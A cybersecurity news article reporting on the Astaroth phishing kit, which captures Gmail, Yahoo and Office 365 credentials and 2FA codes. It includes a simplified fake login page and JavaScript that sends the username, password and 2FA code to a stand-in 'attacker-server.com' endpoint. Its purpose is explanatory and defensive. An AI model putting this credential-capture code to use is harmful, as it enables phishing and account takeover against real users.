New Astaroth 2FA Phishing Kit Targeting Gmail, Yahoo, Office 365, and 3rd-Party Logins

A sophisticated phishing kit, known as the Astaroth 2FA phishing kit, has been identified targeting major email services such as Gmail, Yahoo, and Office 365, along with third-party login platforms.

This kit is designed to bypass two-factor authentication (2FA) security measures, posing a significant threat to users’ online security.

The Astaroth phishing kit is highly customizable and can be tailored to mimic the login pages of various services, making it difficult for users to distinguish between legitimate and fake sites.

Moreover, security analysts at SlahsNext identified that t uses advanced techniques to capture login credentials and 2FA codes, often through SMS or authenticator apps.

Example of what the victim would see (Source – Slashnext)

Here below we have mentioned all the key features:-

  • Customizable Templates: The kit includes templates for popular services like Gmail, Yahoo, and Office 365, allowing attackers to create convincing phishing pages.
  • 2FA Bypass: It can intercept and use 2FA codes, either by tricking users into revealing them or by exploiting vulnerabilities in authenticator apps.
  • Data Encryption: The captured data is encrypted and sent to the attacker’s server, making it difficult for security systems to detect.
Example of what the victim and attacker would see (Source – Slashnext)

Technical Implementation

The phishing kit typically involves a combination of HTML, CSS, and JavaScript to create fake login pages. Here is a simplified example of how such a page might be structured:-

<!DOCTYPE html>
<html>
<head>
    <title>Login Page</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <form id="loginForm">
        <input type="text" id="username" placeholder="Username">
        <input type="password" id="password" placeholder="Password">
        <input type="text" id="2faCode" placeholder="2FA Code">
        <button type="submit">Login</button>
    </form>

    <script src="script.js"></script>
</body>
</html>
The attacker’s web panel that stores session information (Source – Slashnext)

The JavaScript (script.js) would handle form submission, capturing user input and sending it to the attacker’s server:

document.getElementById('loginForm').addEventListener('submit', function(e) {
    e.preventDefault();
    var username = document.getElementById('username').value;
    var password = document.getElementById('password').value;
    var twoFaCode = document.getElementById('2faCode').value;

    // Send data to attacker's server
    fetch('https://attacker-server.com/capture', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({username: username, password: password, twoFaCode: twoFaCode})
    });
});
The seller sharing information on testing the phishing kit out (Source – Slashnext)

The Astaroth 2FA phishing kit represents a serious threat to online security, as it targets not only email services but also third-party platforms.

Users should remain vigilant and use additional security measures such as authenticator apps with push notifications instead of SMS-based 2FA.

To safeguard against sophisticated phishing attacks like the Astaroth 2FA phishing kit, users should create strong, unique passwords, enable two-factor authentication (2FA) using authenticator apps, and exercise caution when handling links or attachments from unknown sources.

Besides this, keeping browsers and operating systems updated is essential for enhanced security.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

Tushar Subhra Dutta
Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.